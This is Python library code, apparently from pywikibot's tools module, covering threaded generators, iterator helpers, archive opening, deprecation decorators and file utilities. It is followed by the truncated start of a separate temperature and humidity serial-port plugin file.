"""Run the generator and store the results on the queue."""
iterable = any(hasattr(self.generator, key)
for key in ('__iter__', '__getitem__'))
if iterable and not self.args and not self.kwargs:
self.__gen = self.generator
else:
self.__gen = self.generator(*self.args, **self.kwargs)
for result in self.__gen:
while True:
if self.finished.isSet():
return
try:
self.queue.put_nowait(result)
except queue.Full:
time.sleep(0.25)
continue
break
# wait for queue to be emptied, then kill the thread
while not self.finished.isSet() and not self.queue.empty():
time.sleep(0.25)
self.stop()
def itergroup(iterable, size: int):
"""Make an iterator that returns lists of (up to) size items from iterable.
Example:
>>> i = itergroup(range(25), 10)
>>> print(next(i))
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
>>> print(next(i))
[10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
>>> print(next(i))
[20, 21, 22, 23, 24]
>>> print(next(i))
Traceback (most recent call last):
...
StopIteration
"""
group = []
for item in iterable:
group.append(item)
if len(group) == size:
yield group
group = []
if group:
yield group
def islice_with_ellipsis(iterable, *args, marker='…'):
"""
Generator which yields the first n elements of the iterable.
If more elements are available and marker is True, it returns an extra
string marker as continuation mark.
Function takes the
and the additional keyword marker.
@param iterable: the iterable to work on
@type iterable: iterable
@param args: same args as:
- C{itertools.islice(iterable, stop)}
- C{itertools.islice(iterable, start, stop[, step])}
@param marker: element to yield if iterable still contains elements
after showing the required number. Default value: '…'
@type marker: str
"""
s = slice(*args)
_iterable = iter(iterable)
yield from itertools.islice(_iterable, *args)
if marker and s.stop is not None:
with suppress(StopIteration):
next(_iterable)
yield marker
class ThreadList(list):
"""A simple threadpool class to limit the number of simultaneous threads.
Any threading.Thread object can be added to the pool using the append()
method. If the maximum number of simultaneous threads has not been reached,
the Thread object will be started immediately; if not, the append() call
will block until the thread is able to start.
>>> pool = ThreadList(limit=10)
>>> def work():
... time.sleep(1)
...
>>> for x in range(20):
... pool.append(threading.Thread(target=work))
...
"""
_logger = 'threadlist'
def __init__(self, limit=128, wait_time=2, *args):
"""Initializer.
@param limit: the number of simultaneous threads
@type limit: int
@param wait_time: how long to wait if active threads exceeds limit
@type wait_time: int or float
"""
self.limit = limit
self.wait_time = wait_time
super().__init__(*args)
for item in self:
if not isinstance(item, threading.Thread):
raise TypeError("Cannot add '{}' to ThreadList"
.format(type(item)))
def active_count(self):
"""Return the number of alive threads and delete all non-alive ones."""
cnt = 0
for item in self[:]:
if item.is_alive():
cnt += 1
else:
self.remove(item)
return cnt
def append(self, thd):
"""Add a thread to the pool and start it."""
if not isinstance(thd, threading.Thread):
raise TypeError("Cannot append '{}' to ThreadList"
.format(type(thd)))
while self.active_count() >= self.limit:
time.sleep(self.wait_time)
super().append(thd)
thd.start()
debug("thread {} ('{}') started".format(len(self), type(thd)),
self._logger)
def stop_all(self):
"""Stop all threads the pool."""
if self:
debug('EARLY QUIT: Threads: {}'.format(len(self)), self._logger)
for thd in self:
thd.stop()
debug('EARLY QUIT: Queue size left in {}: {}'
.format(thd, thd.queue.qsize()), self._logger)
def intersect_generators(genlist, allow_duplicates=False):
"""
Intersect generators listed in genlist.
Yield items only if they are yielded by all generators in genlist.
Threads (via ThreadedGenerator) are used in order to run generators
in parallel, so that items can be yielded before generators are
exhausted.
Threads are stopped when they are either exhausted or Ctrl-C is pressed.
Quitting before all generators are finished is attempted if
there is no more chance of finding an item in all queues.
@param genlist: list of page generators
@type genlist: list
@param allow_duplicates: allow duplicates if present in all generators
@type allow_duplicates: bool
"""
# If any generator is empty, no pages are going to be returned
for source in genlist:
if not source:
debug('At least one generator ({!r}) is empty and execution was '
'skipped immediately.'.format(source), 'intersect')
return
# Item is cached to check that it is found n_gen
# times before being yielded.
from collections import Counter
cache = collections.defaultdict(Counter)
n_gen = len(genlist)
# Class to keep track of alive threads.
# Start new threads and remove completed threads.
thrlist = ThreadList()
for source in genlist:
threaded_gen = ThreadedGenerator(name=repr(source), target=source)
threaded_gen.daemon = True
thrlist.append(threaded_gen)
ones = Counter(thrlist)
seen = {}
while True:
# Get items from queues in a round-robin way.
for t in thrlist:
try:
# TODO: evaluate if True and timeout is necessary.
item = t.queue.get(True, 0.1)
if not allow_duplicates and hash(item) in seen:
continue
# Cache entry is a Counter of ThreadedGenerator objects.
cache[item].update([t])
if len(cache[item]) == n_gen:
if allow_duplicates:
yield item
# Remove item from cache if possible.
if all(el == 1 for el in cache[item].values()):
cache.pop(item)
else:
cache[item] -= ones
else:
yield item
cache.pop(item)
seen[hash(item)] = True
active = thrlist.active_count()
max_cache = n_gen
if cache.values():
max_cache = max(len(v) for v in cache.values())
# No. of active threads is not enough to reach n_gen.
# We can quit even if some thread is still active.
# There could be an item in all generators which has not yet
# appeared from any generator. Only when we have lost one
# generator, then we can bail out early based on seen items.
if active < n_gen and n_gen - max_cache > active:
thrlist.stop_all()
return
except queue.Empty:
pass
except KeyboardInterrupt:
thrlist.stop_all()
finally:
# All threads are done.
if thrlist.active_count() == 0:
return
def roundrobin_generators(*iterables):
"""Yield simultaneous from each iterable.
Sample:
>>> tuple(roundrobin_generators('ABC', range(5)))
('A', 0, 'B', 1, 'C', 2, 3, 4)
@param iterables: any iterable to combine in roundrobin way
@type iterables: iterable
@return: the combined generator of iterables
@rtype: generator
"""
return (item
for item in itertools.chain.from_iterable(zip_longest(*iterables))
if item is not None)
def filter_unique(iterable, container=None, key=None, add=None):
"""
Yield unique items from an iterable, omitting duplicates.
By default, to provide uniqueness, it puts the generated items into a
set created as a local variable. It only yields items which are not
already present in the local set.
For large collections, this is not memory efficient, as a strong reference
to every item is kept in a local set which cannot be cleared.
Also, the local set can't be re-used when chaining unique operations on
multiple generators.
To avoid these issues, it is advisable for the caller to provide their own
container and set the key parameter to be the function L{hash}, or use a
L{weakref} as the key.
The container can be any object that supports __contains__.
If the container is a set or dict, the method add or __setitem__ will be
used automatically. Any other method may be provided explicitly using the
add parameter.
Beware that key=id is only useful for cases where id() is not unique.
Note: This is not thread safe.
@param iterable: the source iterable
@type iterable: collections.abc.Iterable
@param container: storage of seen items
@type container: type
@param key: function to convert the item to a key
@type key: callable
@param add: function to add an item to the container
@type add: callable
"""
if container is None:
container = set()
if not add:
if hasattr(container, 'add'):
def container_add(x):
container.add(key(x) if key else x)
add = container_add
else:
def container_setitem(x):
container.__setitem__(key(x) if key else x,
True)
add = container_setitem
for item in iterable:
try:
if (key(item) if key else item) not in container:
add(item)
yield item
except StopIteration:
return
class CombinedError(KeyError, IndexError):
"""An error that gets caught by both KeyError and IndexError."""
class EmptyDefault(str, Mapping):
"""
A default for a not existing siteinfo property.
It should be chosen if there is no better default known. It acts like an
empty collections, so it can be iterated through it safely if treated as a
list, tuple, set or dictionary. It is also basically an empty string.
Accessing a value via __getitem__ will result in a combined KeyError and
IndexError.
"""
def __init__(self):
"""Initialise the default as an empty string."""
str.__init__(self)
def __iter__(self):
"""An iterator which does nothing and drops the argument."""
return empty_iterator()
def __getitem__(self, key):
"""Raise always a L{CombinedError}."""
raise CombinedError(key)
EMPTY_DEFAULT = EmptyDefault()
class SelfCallMixin:
"""
Return self when called.
When '_own_desc' is defined it'll also issue a deprecation warning using
issue_deprecation_warning('Calling ' + _own_desc, 'it directly').
"""
def __call__(self):
"""Do nothing and just return itself."""
if hasattr(self, '_own_desc'):
issue_deprecation_warning('Calling {}'.format(self._own_desc),
'it directly',
warning_class=FutureWarning,
since='20150515')
return self
class SelfCallDict(SelfCallMixin, dict):
"""Dict with SelfCallMixin."""
pass
class SelfCallString(SelfCallMixin, str):
"""String with SelfCallMixin."""
pass
class DequeGenerator(Iterator, collections.deque):
"""A generator that allows items to be added during generating."""
def __next__(self):
"""Iterator method."""
if len(self):
return self.popleft()
else:
raise StopIteration
def open_archive(filename, mode='rb', use_extension=True):
"""
Open a file and uncompress it if needed.
This function supports bzip2, gzip, 7zip, lzma, and xz as compression
containers. It uses the packages available in the standard library for
bzip2, gzip, lzma, and xz so they are always available. 7zip is only
available when a 7za program is available and only supports reading
from it.
The compression is either selected via the magic number or file ending.
@param filename: The filename.
@type filename: str
@param use_extension: Use the file extension instead of the magic number
to determine the type of compression (default True). Must be True when
writing or appending.
@type use_extension: bool
@param mode: The mode in which the file should be opened. It may either be
'r', 'rb', 'a', 'ab', 'w' or 'wb'. All modes open the file in binary
mode. It defaults to 'rb'.
@type mode: str
@raises ValueError: When 7za is not available or the opening mode is
unknown or it tries to write a 7z archive.
@raises FileNotFoundError: When the filename doesn't exist and it tries
to read from it or it tries to determine the compression algorithm.
@raises OSError: When it's not a 7z archive but the file extension is 7z.
It is also raised by bz2 when its content is invalid. gzip does not
immediately raise that error but only on reading it.
@raises lzma.LZMAError: When error occurs during compression or
decompression or when initializing the state with lzma or xz.
@raises ImportError: When file is compressed with bz2 but neither bz2 nor
bz2file is importable, or when file is compressed with lzma or xz but
lzma is not importable.
@return: A file-like object returning the uncompressed data in binary mode.
@rtype: file-like object
"""
# extension_map maps magic_number to extension.
# Unfortunately, legacy LZMA container has no magic number
extension_map = {
b'BZh': 'bz2',
b'\x1F\x8B\x08': 'gz',
b"7z\xBC\xAF'\x1C": '7z',
b'\xFD7zXZ\x00': 'xz',
}
if mode in ('r', 'a', 'w'):
mode += 'b'
elif mode not in ('rb', 'ab', 'wb'):
raise ValueError('Invalid mode: "{}"'.format(mode))
if use_extension:
# if '.' not in filename, it'll be 1 character long but otherwise
# contain the period
extension = filename[filename.rfind('.'):][1:]
else:
if mode != 'rb':
raise ValueError('Magic number detection only when reading')
with open(filename, 'rb') as f:
magic_number = f.read(8)
for pattern in extension_map:
if magic_number.startswith(pattern):
extension = extension_map[pattern]
break
else:
extension = ''
if extension == 'bz2':
if isinstance(bz2, ImportError):
raise bz2
return bz2.BZ2File(filename, mode)
if extension == 'gz':
return gzip.open(filename, mode)
if extension == '7z':
if mode != 'rb':
raise NotImplementedError('It is not possible to write a 7z file.')
try:
process = subprocess.Popen(['7za', 'e', '-bd', '-so', filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=65535)
except OSError:
raise ValueError('7za is not installed or cannot '
'uncompress "{}"'.format(filename))
else:
stderr = process.stderr.read()
process.stderr.close()
if stderr != b'':
process.stdout.close()
raise OSError(
'Unexpected STDERR output from 7za {}'.format(stderr))
return process.stdout
if extension in ('lzma', 'xz'):
if isinstance(lzma, ImportError):
raise lzma
lzma_fmts = {'lzma': lzma.FORMAT_ALONE, 'xz': lzma.FORMAT_XZ}
return lzma.open(filename, mode, format=lzma_fmts[extension])
# assume it's an uncompressed file
return open(filename, 'rb')
def merge_unique_dicts(*args, **kwargs):
"""
Return a merged dict and make sure that the original dicts keys are unique.
The positional arguments are the dictionaries to be merged. It is also
possible to define an additional dict using the keyword arguments.
"""
args = list(args) + [dict(kwargs)]
conflicts = set()
result = {}
for arg in args:
conflicts |= set(arg.keys()) & set(result.keys())
result.update(arg)
if conflicts:
raise ValueError('Multiple dicts contain the same keys: {}'
.format(', '.join(sorted(str(key)
for key in conflicts))))
return result
# Decorators
#
# Decorator functions without parameters are _invoked_ differently from
# decorator functions with function syntax. For example, @deprecated causes
# a different invocation to @deprecated().
# The former is invoked with the decorated function as args[0].
# The latter is invoked with the decorator arguments as *args & **kwargs,
# and it must return a callable which will be invoked with the decorated
# function as args[0].
# The follow deprecators may support both syntax, e.g. @deprecated and
# @deprecated() both work. In order to achieve that, the code inspects
# args[0] to see if it callable. Therefore, a decorator must not accept
# only one arg, and that arg be a callable, as it will be detected as
# a deprecator without any arguments.
def add_decorated_full_name(obj, stacklevel=1):
"""Extract full object name, including class, and store in __full_name__.
This must be done on all decorators that are chained together, otherwise
the second decorator will have the wrong full name.
@param obj: A object being decorated
@type obj: object
@param stacklevel: level to use
@type stacklevel: int
"""
if hasattr(obj, '__full_name__'):
return
# The current frame is add_decorated_full_name
# The next frame is the decorator
# The next frame is the object being decorated
frame = sys._getframe(stacklevel + 1)
class_name = frame.f_code.co_name
if class_name and class_name != '<module>':
obj.__full_name__ = '{}.{}.{}'.format(obj.__module__,
class_name, obj.__name__)
else:
obj.__full_name__ = '{}.{}'.format(obj.__module__, obj.__name__)
def manage_wrapping(wrapper, obj):
"""Add attributes to wrapper and wrapped functions."""
wrapper.__doc__ = obj.__doc__
wrapper.__name__ = obj.__name__
wrapper.__module__ = obj.__module__
wrapper.__signature__ = inspect.signature(obj)
if not hasattr(obj, '__full_name__'):
add_decorated_full_name(obj, 2)
wrapper.__full_name__ = obj.__full_name__
# Use the previous wrappers depth, if it exists
wrapper.__depth__ = getattr(obj, '__depth__', 0) + 1
# Obtain the wrapped object from the previous wrapper
wrapped = getattr(obj, '__wrapped__', obj)
wrapper.__wrapped__ = wrapped
# Increment the number of wrappers
if hasattr(wrapped, '__wrappers__'):
wrapped.__wrappers__ += 1
else:
wrapped.__wrappers__ = 1
def get_wrapper_depth(wrapper):
"""Return depth of wrapper function."""
return wrapper.__wrapped__.__wrappers__ + (1 - wrapper.__depth__)
def add_full_name(obj):
"""
A decorator to add __full_name__ to the function being decorated.
This should be done for all decorators used in pywikibot, as any
decorator that does not add __full_name__ will prevent other
decorators in the same chain from being able to obtain it.
This can be used to monkey-patch decorators in other modules.
e.g.
<xyz>.foo = add_full_name(<xyz>.foo)
@param obj: The function to decorate
@type obj: callable
@return: decorating function
@rtype: function
"""
def outer_wrapper(*outer_args, **outer_kwargs):
"""Outer wrapper.
The outer wrapper may be the replacement function if the decorated
decorator was called without arguments, or the replacement decorator
if the decorated decorator was called without arguments.
@param outer_args: args
@param outer_kwargs: kwargs
"""
def inner_wrapper(*args, **kwargs):
"""Replacement function.
If the decorator supported arguments, they are in outer_args,
and this wrapper is used to process the args which belong to
the function that the decorated decorator was decorating.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
"""
add_decorated_full_name(args[0])
return obj(*outer_args, **outer_kwargs)(*args, **kwargs)
inner_wrapper.__doc__ = obj.__doc__
inner_wrapper.__name__ = obj.__name__
inner_wrapper.__module__ = obj.__module__
inner_wrapper.__signature__ = inspect.signature(obj)
# The decorator being decorated may have args, so both
# syntax need to be supported.
if (len(outer_args) == 1 and not outer_kwargs
and callable(outer_args[0])):
add_decorated_full_name(outer_args[0])
return obj(outer_args[0])
else:
return inner_wrapper
if not __debug__:
return obj
return outer_wrapper
def _build_msg_string(instead, since):
"""Build a deprecation warning message format string."""
if not since:
since = ''
elif '.' in since:
since = ' since release ' + since
else:
year_str = month_str = day_str = ''
days = (datetime.utcnow() - datetime.strptime(since, '%Y%m%d')).days
years = days // 365
days = days % 365
months = days // 30
days = days % 30
if years == 1:
years = 0
months += 12
if years:
year_str = '{} years'.format(years)
else:
day_str = '{} day{}'.format(days, 's' if days != 1 else '')
if months:
month_str = '{} month{}'.format(
months, 's' if months != 1 else '')
if year_str and month_str:
year_str += ' and '
if month_str and day_str:
month_str += ' and '
since = ' for {}{}{}'.format(year_str, month_str, day_str)
if instead:
msg = '{{0}} is deprecated{since}; use {{1}} instead.'
else:
msg = '{{0}} is deprecated{since}.'
return msg.format(since=since)
def issue_deprecation_warning(name: str, instead=None, depth=2,
warning_class=None, since=None):
"""Issue a deprecation warning.
@param name: the name of the deprecated object
@param instead: suggested replacement for the deprecated object
@type instead: str or None
@param depth: depth + 1 will be used as stacklevel for the warnings
@type depth: int
@param warning_class: a warning class (category) to be used, defaults to
DeprecationWarning
@type warning_class: type
@param since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@type since: str or None
"""
msg = _build_msg_string(instead, since)
if warning_class is None:
warning_class = (DeprecationWarning
if instead else _NotImplementedWarning)
warn(msg.format(name, instead), warning_class, depth + 1)
@add_full_name
def deprecated(*args, **kwargs):
"""Decorator to output a deprecation warning.
@kwarg instead: if provided, will be used to specify the replacement
@type instead: str
@kwarg since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@type since: str
@kwarg future_warning: if True a FutureWarning will be thrown,
otherwise it defaults to DeprecationWarning
@type future_warning: bool
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*args, **kwargs):
"""Replacement function.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
issue_deprecation_warning(
name, instead, depth, since=since,
warning_class=FutureWarning if future_warning else None)
return obj(*args, **kwargs)
def add_docstring(wrapper):
"""Add a Deprecated notice to the docstring."""
deprecation_notice = 'Deprecated'
if instead:
deprecation_notice += '; use ' + instead + ' instead'
deprecation_notice += '.\n\n'
if wrapper.__doc__: # Append old docstring after the notice
wrapper.__doc__ = deprecation_notice + wrapper.__doc__
else:
wrapper.__doc__ = deprecation_notice
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
# Regular expression to find existing deprecation notices
deprecated_notice = re.compile(r'(^|\s)DEPRECATED[.:;,]',
re.IGNORECASE)
# Add the deprecation notice to the docstring if not present
if not wrapper.__doc__:
add_docstring(wrapper)
else:
if not deprecated_notice.search(wrapper.__doc__):
add_docstring(wrapper)
else:
# Get docstring up to @params so deprecation notices for
# parameters don't disrupt it
trim_params = re.compile(r'^.*?((?=@param)|$)', re.DOTALL)
trimmed_doc = trim_params.match(wrapper.__doc__).group(0)
if not deprecated_notice.search(trimmed_doc): # No notice
add_docstring(wrapper)
return wrapper
since = kwargs.pop('since', None)
future_warning = kwargs.pop('future_warning', False)
without_parameters = (len(args) == 1 and len(kwargs) == 0
and callable(args[0]))
if 'instead' in kwargs:
instead = kwargs['instead']
elif not without_parameters and len(args) == 1:
instead = args[0]
else:
instead = False
# When called as @deprecated, return a replacement function
if without_parameters:
if not __debug__:
return args[0]
return decorator(args[0])
# Otherwise return a decorator, which returns a replacement function
return decorator
def deprecate_arg(old_arg: str, new_arg):
"""Decorator to declare old_arg deprecated and replace it with new_arg.
Usage:
@deprecate_arg('foo', 'bar')
def my_function(bar='baz'): pass
# replaces 'foo' keyword by 'bar' used by my_function
@deprecare_arg('foo', None)
def my_function(): pass
# ignores 'foo' keyword no longer used by my_function
deprecated_args decorator should be used in favour of this
deprecate_arg decorator but it is held to deprecate args which become
a reserved word in future Python releases and to prevent syntax errors.
@param old_arg: old keyword
@param new_arg: new keyword
@type new_arg: str or None or bool
"""
return deprecated_args(**{old_arg: new_arg})
def deprecated_args(**arg_pairs):
"""Decorator to declare multiple args deprecated.
Usage:
@deprecated_args(foo='bar', baz=None)
def my_function(bar='baz'): pass
# replaces 'foo' keyword by 'bar' and ignores 'baz' keyword
@param arg_pairs: Each entry points to the new argument name. If an
argument is to be removed, the value may be one of the following:
- None: shows a DeprecationWarning
- False: shows a PendingDeprecationWarning
- True: shows a FutureWarning (only once)
- empty string: no warning is printed
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@param __kw: kwargs passed to the decorated function
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
for old_arg, new_arg in arg_pairs.items():
output_args = {
'name': name,
'old_arg': old_arg,
'new_arg': new_arg,
}
if old_arg not in __kw:
continue
if new_arg not in [True, False, None, '']:
if new_arg in __kw:
warn('{new_arg} argument of {name} '
'replaces {old_arg}; cannot use both.'
.format_map(output_args),
RuntimeWarning, depth)
else:
# If the value is positionally given this will
# cause a TypeError, which is intentional
warn('{old_arg} argument of {name} '
'is deprecated; use {new_arg} instead.'
.format_map(output_args),
DeprecationWarning, depth)
__kw[new_arg] = __kw[old_arg]
elif new_arg == '':
pass
else:
if new_arg is False:
cls = PendingDeprecationWarning
elif new_arg is True:
cls = FutureWarning
else: # new_arg is None
cls = DeprecationWarning
warn('{old_arg} argument of {name} is deprecated.'
.format_map(output_args),
cls, depth)
del __kw[old_arg]
return obj(*__args, **__kw)
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
if wrapper.__signature__:
# Build a new signature with deprecated args added.
params = collections.OrderedDict()
for param in wrapper.__signature__.parameters.values():
params[param.name] = param.replace()
for old_arg, new_arg in arg_pairs.items():
params[old_arg] = inspect.Parameter(
old_arg, kind=inspect._POSITIONAL_OR_KEYWORD,
default='[deprecated name of {}]'.format(new_arg)
if new_arg not in [True, False, None, '']
else NotImplemented)
params = collections.OrderedDict(sorted(params.items(),
key=lambda x: x[1].kind))
wrapper.__signature__ = inspect.Signature()
wrapper.__signature__._parameters = params
return wrapper
return decorator
def remove_last_args(arg_names):
"""
Decorator to declare all args additionally provided deprecated.
All positional arguments appearing after the normal arguments are marked
deprecated. It marks also all keyword arguments present in arg_names as
deprecated. Any arguments (positional or keyword) which are not present in
arg_names are forwarded. For example a call with 3 parameters and the
original function requests one and arg_names contain one name will result
in an error, because the function got called with 2 parameters.
The decorated function may not use C{*args} or C{**kwargs}.
@param arg_names: The names of all arguments.
@type arg_names: iterable; for the most explanatory message it should
retain the given order (so not a set for example).
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@param __kw: kwargs passed to the decorated function
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
args, varargs, kwargs, *_ = getfullargspec(wrapper.__wrapped__)
if varargs is not None and kwargs is not None:
raise ValueError('{} may not have * or ** args.'
.format(name))
deprecated = set(__kw) & set(arg_names)
if len(__args) > len(args):
deprecated.update(arg_names[:len(__args) - len(args)])
# remove at most |arg_names| entries from the back
new_args = tuple(__args[:max(len(args),
len(__args) - len(arg_names))])
new_kwargs = {arg: val for arg, val in __kw.items()
if arg not in arg_names}
if deprecated:
# sort them according to arg_names
deprecated = [arg for arg in arg_names if arg in deprecated]
warn("The trailing arguments ('{}') of {} are deprecated. "
"The value(s) provided for '{}' have been dropped."
.format("', '".join(arg_names), name,
"', '".join(deprecated)),
DeprecationWarning, depth)
return obj(*new_args, **new_kwargs)
manage_wrapping(wrapper, obj)
return wrapper
return decorator
def redirect_func(target, source_module: Optional[str] = None,
target_module: Optional[str] = None,
old_name: Optional[str] = None,
class_name: Optional[str] = None,
since: Optional[str] = None,
future_warning=False):
"""
Return a function which can be used to redirect to 'target'.
It also acts like marking that function deprecated and copies all
parameters.
@param target: The targeted function which is to be executed.
@type target: callable
@param source_module: The module of the old function. If '.' defaults
to target_module. If 'None' (default) it tries to guess it from the
executing function.
@param target_module: The module of the target function. If
'None' (default) it tries to get it from the target. Might not work
with nested classes.
@param old_name: The old function name. If None it uses the name of the
new function.
@param class_name: The name of the class. It's added to the target and
source module (separated by a '.').
@param since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@param future_warning: if True a FutureWarning will be thrown,
otherwise it defaults to DeprecationWarning
@type future_warning: bool
@return: A new function which adds a warning prior to each execution.
@rtype: callable
"""
def call(*a, **kw):
issue_deprecation_warning(
old_name, new_name, since=since,
warning_class=FutureWarning if future_warning else None)
return target(*a, **kw)
if target_module is None:
target_module = target.__module__
if target_module and target_module[-1] != '.':
target_module += '.'
if source_module == '.':
source_module = target_module
elif source_module and source_module[-1] != '.':
source_module += '.'
else:
source_module = sys._getframe(1).f_globals['__name__'] + '.'
if class_name:
target_module += class_name + '.'
source_module += class_name + '.'
old_name = source_module + (old_name or target.__name__)
new_name = target_module + target.__name__
if not __debug__:
return target
return call
class ModuleDeprecationWrapper(types.ModuleType):
"""A wrapper for a module to deprecate classes or variables of it."""
def __init__(self, module):
"""
Initialise the wrapper.
It will automatically overwrite the module with this instance in
C{sys.modules}.
@param module: The module name or instance
@type module: str or module
"""
if isinstance(module, (str, bytes)):
module = sys.modules[module]
super().__setattr__('_deprecated', {})
super().__setattr__('_module', module)
self.__dict__.update(module.__dict__)
if __debug__:
sys.modules[module.__name__] = self
def _add_deprecated_attr(self, name: str, replacement=None,
replacement_name: Optional[str] = None,
warning_message: Optional[str] = None,
since: Optional[str] = None,
future_warning: bool = False):
"""
Add the name to the local deprecated names dict.
@param name: The name of the deprecated class or variable. It may not
be already deprecated.
@param replacement: The replacement value which should be returned
instead. If the name is already an attribute of that module this
must be None. If None it'll return the attribute of the module.
@type replacement: any
@param replacement_name: The name of the new replaced value. Required
if C{replacement} is not None and it has no __name__ attribute.
If it contains a '.', it will be interpreted as a Python dotted
object name, and evaluated when the deprecated object is needed.
@param warning_message: The warning to display, with positional
variables: {0} = module, {1} = attribute name, {2} = replacement.
@param since: a timestamp string of the date when the method was
deprecated (form 'YYYYMMDD') or a version string.
@param future_warning: if True a FutureWarning will be thrown,
otherwise it defaults to DeprecationWarning
"""
if '.' in name:
raise ValueError('Deprecated name "{}" may not contain '
'".".'.format(name))
if name in self._deprecated:
raise ValueError('Name "{}" is already deprecated.'.format(name))
if replacement is not None and hasattr(self._module, name):
raise ValueError('Module has already an attribute named '
'"{}".'.format(name))
if replacement_name is None:
if hasattr(replacement, '__name__'):
replacement_name = replacement.__module__
if hasattr(replacement, '__self__'):
replacement_name += '.'
replacement_name += replacement.__self__.__class__.__name__
replacement_name += '.' + replacement.__name__
else:
raise TypeError('Replacement must have a __name__ attribute '
'or a replacement name must be set '
'specifically.')
if not warning_message:
warning_message = _build_msg_string(
replacement_name, since).format('{0}.{1}', '{2}')
if hasattr(self, name):
# __getattr__ will only be invoked if self.<name> does not exist.
delattr(self, name)
self._deprecated[name] = (
replacement_name, replacement, warning_message, future_warning)
def __setattr__(self, attr, value):
"""Set the value of the wrapped module."""
self.__dict__[attr] = value
setattr(self._module, attr, value)
def __getattr__(self, attr):
"""Return the attribute with a deprecation warning if required."""
if attr in self._deprecated:
name, repl, message, future = self._deprecated[attr]
warning_message = message
warn(warning_message.format(self._module.__name__, attr, name),
FutureWarning if future else DeprecationWarning, 2)
if repl:
return repl
if '.' in name:
with suppress(Exception):
package_name = name.split('.', 1)[0]
module = import_module(package_name)
context = {package_name: module}
replacement = eval(name, context)
self._deprecated[attr] = (
name, replacement, message, future)
return replacement
return getattr(self._module, attr)
def file_mode_checker(filename: str, mode=0o600, quiet=False, create=False):
"""Check file mode and update it, if needed.
@param filename: filename path
@param mode: requested file mode
@type mode: int
@param quiet: warn about file mode change if False.
@type quiet: bool
@param create: create the file if it does not exist already
@type create: bool
@raise IOError: The file does not exist and `create` is False.
"""
try:
st_mode = os.stat(filename).st_mode
except OSError: # file does not exist
if not create:
raise
os.close(os.open(filename, os.O_CREAT | os.O_EXCL, mode))
return
warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'
if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):
os.chmod(filename, mode)
# re-read and check changes
if os.stat(filename).st_mode != st_mode and not quiet:
warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))
def compute_file_hash(filename: str, sha='sha1', bytes_to_read=None):
"""Compute file hash.
Result is expressed as hexdigest().
@param filename: filename path
@param sha: hashing function among the following in hashlib:
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
function name shall be passed as string, e.g. 'sha1'.
@type sha: str
@param bytes_to_read: only the first bytes_to_read will be considered;
if file size is smaller, the whole file will be considered.
@type bytes_to_read: None or int
"""
size = os.path.getsize(filename)
if bytes_to_read is None:
bytes_to_read = size
else:
bytes_to_read = min(bytes_to_read, size)
step = 1 << 20
shas = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
assert sha in shas
sha = getattr(hashlib, sha)() # sha instance
with open(filename, 'rb') as f:
while bytes_to_read > 0:
read_bytes = f.read(min(bytes_to_read, step))
assert read_bytes # make sure we actually read bytes
bytes_to_read -= len(read_bytes)
sha.update(read_bytes)
return sha.hexdigest()
# deprecated parts ############################################################
@deprecated('bot_choice.Option and its subclasses', since='20181217')
def concat_options(message, line_length, options):
"""DEPRECATED. Concatenate options."""
indent = len(message) + 2
line_length -= indent
option_msg = ''
option_line = ''
for option in options:
if option_line:
option_line += ', '
# +1 for ','
if len(option_line) + len(option) + 1 > line_length:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line[:-1] # remove space
option_line = ''
option_line += option
if option_line:
if option_msg:
option_msg += '\n' + ' ' * indent
option_msg += option_line
return '{} ({}):'.format(message, option_msg)
def _py2():
"""Function for deprecated PY2 variable used by wrapper below."""
return (PYTHON_VERSION[0] == 2)
wrapper = ModuleDeprecationWrapper(__name__)
wrapper._add_deprecated_attr('FrozenDict', _FrozenDict,
replacement_name='tools.frozenmap',
since='20201109', future_warning=True)
wrapper._add_deprecated_attr('PY2', _py2(),
replacement_name='sys.version_info[0] == 2',
since='20201224', future_warning=True)
|
MAPS_temp_plugin.py
|
# -*- coding: UTF-8 -*-
# mod for temp/RH plugin
import math
import time
import serial
import threading
from datetime import datetime
from collections import deque
from statistics import median
MIC_COM_PORT = '/dev/ttyACM0'
BAUD_RATES = 115200
#pairs = datetime.now().strftime("%Y-%m-%d %H-%M").split(" ")
#time_slot_string = ""
#slot_count = 0
#slot_energy = 0
#Leq = 0
#Leq_Max = 0
#Leq_Min = 0
#Leq_Median = 0
temp_data = 0
rh_data = 0
#notice: we use a sliding windows to calculate Max/Min/Mid
# one goes in, one come out
#dba_windows = deque(maxlen=60)
"""
# explan how Leq worked
- first we have a lot of data in 1 second
ex: dB(A)_t0 = 50 db ~ dB(A)_tn = 60 db
- second, do "pow(10,(x/5))" to get energy of t0
- next, "sum up pow_t0 ~ pow_tn" and cacluate "pow_AVG" (depends on how long we want)
- do a "sqrt(pow_AVG)" to get energy of this time period
